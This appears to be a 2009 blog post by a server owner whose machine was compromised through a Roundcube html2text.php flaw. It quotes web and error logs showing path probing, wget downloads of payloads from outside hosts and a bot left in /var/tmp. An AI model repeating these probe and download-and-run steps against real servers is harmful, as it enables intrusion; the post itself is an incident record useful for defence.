I hate getting hacked

Here is another posting of someone with the same problem

The vulnerability seems to have been in Roundcube, a web-based email program. The sad part is that I’m up-to-date on Debian patches on that.

Here is the relevant web log:

200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:48 -0600] "POST /rc/bin/html2text.php\r HTTP/1.0" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:48 -0600] "POST /mss2/bin/html2text.php\r HTTP/1.0" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:49 -0600] "POST /mail/bin/html2text.php\r HTTP/1.0" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:50 -0600] "POST /roundcubemail/bin/html2text.php\r HTTP/1.0" 404 417 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:51 -0600] "POST /roundcube/bin/html2text.php\r HTTP/1.0" 200 123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
200-206-141-156.dsl.telesp.net.br - - [24/Mar/2009:05:12:56 -0600] "POST /roundcube/bin/html2text.php\r HTTP/1.0" 200 229 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"

And from the apache error log:
[Tue Mar 24 05:12:48 2009] [error] [client 200.206.141.156] File does not exist: /var/www/rc
[Tue Mar 24 05:12:48 2009] [error] [client 200.206.141.156] File does not exist: /var/www/mss2
[Tue Mar 24 05:12:49 2009] [error] [client 200.206.141.156] File does not exist: /var/www/mail
[Tue Mar 24 05:12:50 2009] [error] [client 200.206.141.156] File does not exist: /var/www/roundcubemail
--2009-03-24 05:12:56-- http://loco.ucoz.com/vuln.tgz
Resolving loco.ucoz.com... 208.100.61.101
Connecting to loco.ucoz.com|208.100.61.101|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210574 (206K) [application/octet-stream]
Saving to: `vuln.tgz'

     0K .......... .......... .......... .......... ..........  24%  190K 1s
    50K .......... .......... .......... .......... ..........  48%  655K 0s
   100K .......... .......... .......... .......... ..........  72%  748K 0s
   150K .......... .......... .......... .......... ..........  97%  732K 0s
   200K .....                                                  100% 1012K=0.5s

2009-03-24 05:12:59 (428 KB/s) - `vuln.tgz' saved [210574/210574]

./start.sh: line 1: /#bin/bash: No such file or directory

Here is an earlier, I think failed, attempt to get in, also in the apache error log. The 127.0.0.1 is worrisome:

[Mon Mar 23 18:00:02 2009] [error] [client 127.0.0.1] File does not exist: /var/www/usr
--2009-03-23 18:03:46-- http://www.cr578.com/tx.txt
Resolving www.cr578.com... 61.151.239.81
Connecting to www.cr578.com|61.151.239.81|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22823 (22K) [text/plain]
tx.txt: Permission denied

Cannot write to `tx.txt' (Permission denied).
chmod: cannot access `tx.txt': No such file or directory
Could not open input file: tx.txt

They installed software that started a denial of service attack. It was installed in /var/tmp/… (yes, three dots) and /var/tmp/bot. I noticed that a program named “std” (from /var/tmp/…/std) was using 42% of cpu.